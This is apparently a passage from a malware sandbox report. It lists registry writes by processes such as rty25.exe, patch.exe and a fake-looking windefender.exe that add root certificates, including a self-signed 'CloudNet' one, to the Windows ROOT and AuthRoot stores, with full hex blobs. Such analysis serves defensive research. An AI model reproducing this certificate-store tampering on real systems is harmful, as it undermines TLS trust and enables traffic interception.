windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" windefender.exe -
Processes:
rty25.exepatch.execsrss.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 rty25.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\54B2DD53D4135A2E92D3702447AAFC238EA7F5E3 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\54B2DD53D4135A2E92D3702447AAFC238EA7F5E3\Blob = 1900000001000000100000009aaef5405fb728740f900031b12eb1b10f0000000100000020000000e047c0969441fc814595a03fc433300d299b998b9df3fa6f09d740aa9b253c2d03000000010000001400000054b2dd53d4135a2e92d3702447aafc238ea7f5e31400000001000000140000005e4986d99776fc73cc7d54694e5a2c96afd7f9a62000000001000000f9020000308202f5308201dda0030201020210381f1ba841d8bbe1780b9b2f15f5ad17300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303131383135303030305a170d3239303131363135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100eb14986a705ddecbea5916cd8186358c7f6266e732b265e440b64e62d891a404402d754a52172b6b3ad94bb7a889b451f7b45d5a8830695fa6652bbaa7240af053eb3f92c3e17c5483a73a22d79a95e72da2bfde45893869b6371d2db185959e74f70e05de375fa6a804db43fd38138dcfb0704a8f933106f59f1791f5ae5bd64d8c0a501ef6e26fcc307eb1ce0f8d493e6cbd576b3d21264cd69a7a8d0eb48aa023ca9d5616280fe375e5378128881e9c65cf0aae5f303d22c6c355ea6e54d370a1d30c4747913ce0037b45750acd7f9c07a50aa56d981743306a3cfe21b7ceaca52805d696f325a6dfb5f713dcbc9917089b17ef03b428ab6766e98c8e68390203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604145e4986d99776fc73cc7d54694e5a2c96afd7f9a6300d06092a864886f70d01010b05000382010100d3060f7b3b4214d98c018c2e406ef3080d4d3494a82b1cf0d85514ed320e7881cf2b22dbe3557cc2904e0902b86eaa185e99daaf5082674c4dbcccd037f2bd27e04f7d8e4140320820823f84e5915748b7f40ce2aa934a364de7b1428d042cb860dedd79a66c0f09c73c342a49ef9e0390a458422e073522a3aa3c29b788559a8631d14e8ab735084078f79990b21b7b047182af4bfff6f29ae156779360894c16de80f2ca535a462ed3386f737c58ee0c347ce3b12740263bc87c207d37999c0b69286bb887ae3401db5e13797ec371209f9910a341869ef55d5556d522b4d24c3c4b83243166164b01f58f6368f5866fab0e941f8da0d9cea8f430d15ef2b4 rty25.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 rty25.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 rty25.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 rty25.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\54B2DD53D4135A2E92D3702447AAFC238EA7F5E3\Blob = 0f0000000100000020000000e047c0969441fc814595a03fc433300d299b998b9df3fa6f09d740aa9b253c2d03000000010000001400000054b2dd53d4135a2e92d3702447aafc238ea7f5e32000000001000000f9020000308202f5308201dda0030201020210381f1ba841d8bbe1780b9b2f15f5ad17300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303131383135303030305a170d3239303131363135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100eb14986a705ddecbea5916cd8186358c7f6266e732b265e440b64e62d891a404402d754a52172b6b3ad94bb7a889b451f7b45d5a8830695fa6652bbaa7240af053eb3f92c3e17c5483a73a22d79a95e72da2bfde45893869b6371d2db185959e74f70e05de375fa6a804db43fd38138dcfb0704a8f933106f59f1791f5ae5bd64d8c0a501ef6e26fcc307eb1ce0f8d493e6cbd576b3d21264cd69a7a8d0eb48aa023ca9d5616280fe375e5378128881e9c65cf0aae5f303d22c6c355ea6e54d370a1d30c4747913ce0037b45750acd7f9c07a50aa56d981743306a3cfe21b7ceaca52805d696f325a6dfb5f713dcbc9917089b17ef03b428ab6766e98c8e68390203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604145e4986d99776fc73cc7d54694e5a2c96afd7f9a6300d06092a864886f70d01010b05000382010100d3060f7b3b4214d98c018c2e406ef3080d4d3494a82b1cf0d85514ed320e7881cf2b22dbe3557cc2904e0902b86eaa185e99daaf5082674c4dbcccd037f2bd27e04f7d8e4140320820823f84e5915748b7f40ce2aa934a364de7b1428d042cb860dedd79a66c0f09c73c342a49ef9e0390a458422e073522a3aa3c29b788559a8631d14e8ab735084078f79990b21b7b047182af4bfff6f29ae156779360894c16de80f2ca535a462ed3386f737c58ee0c347ce3b12740263bc87c207d37999c0b69286bb887ae3401db5e13797ec371209f9910a341869ef55d5556d522b4d24c3c4b83243166164b01f58f6368f5866fab0e941f8da0d9cea8f430d15ef2b4 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\54B2DD53D4135A2E92D3702447AAFC238EA7F5E3\Blob = 1400000001000000140000005e4986d99776fc73cc7d54694e5a2c96afd7f9a603000000010000001400000054b2dd53d4135a2e92d3702447aafc238ea7f5e30f0000000100000020000000e047c0969441fc814595a03fc433300d299b998b9df3fa6f09d740aa9b253c2d2000000001000000f9020000308202f5308201dda0030201020210381f1ba841d8bbe1780b9b2f15f5ad17300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303131383135303030305a170d3239303131363135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100eb14986a705ddecbea5916cd8186358c7f6266e732b265e440b64e62d891a404402d754a52172b6b3ad94bb7a889b451f7b45d5a8830695fa6652bbaa7240af053eb3f92c3e17c5483a73a22d79a95e72da2bfde45893869b6371d2db185959e74f70e05de375fa6a804db43fd38138dcfb0704a8f933106f59f1791f5ae5bd64d8c0a501ef6e26fcc307eb1ce0f8d493e6cbd576b3d21264cd69a7a8d0eb48aa023ca9d5616280fe375e5378128881e9c65cf0aae5f303d22c6c355ea6e54d370a1d30c4747913ce0037b45750acd7f9c07a50aa56d981743306a3cfe21b7ceaca52805d696f325a6dfb5f713dcbc9917089b17ef03b428ab6766e98c8e68390203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604145e4986d99776fc73cc7d54694e5a2c96afd7f9a6300d06092a864886f70d01010b05000382010100d3060f7b3b4214d98c018c2e406ef3080d4d3494a82b1cf0d85514ed320e7881cf2b22dbe3557cc2904e0902b86eaa185e99daaf5082674c4dbcccd037f2bd27e04f7d8e4140320820823f84e5915748b7f40ce2aa934a364de7b1428d042cb860dedd79a66c0f09c73c342a49ef9e0390a458422e073522a3aa3c29b788559a8631d14e8ab735084078f79990b21b7b047182af4bfff6f29ae156779360894c16de80f2ca535a462ed3386f737c58ee0c347ce3b12740263bc87c207d37999c0b69286bb887ae3401db5e13797ec371209f9910a341869ef55d5556d522b4d24c3c4b83243166164b01f58f6368f5866fa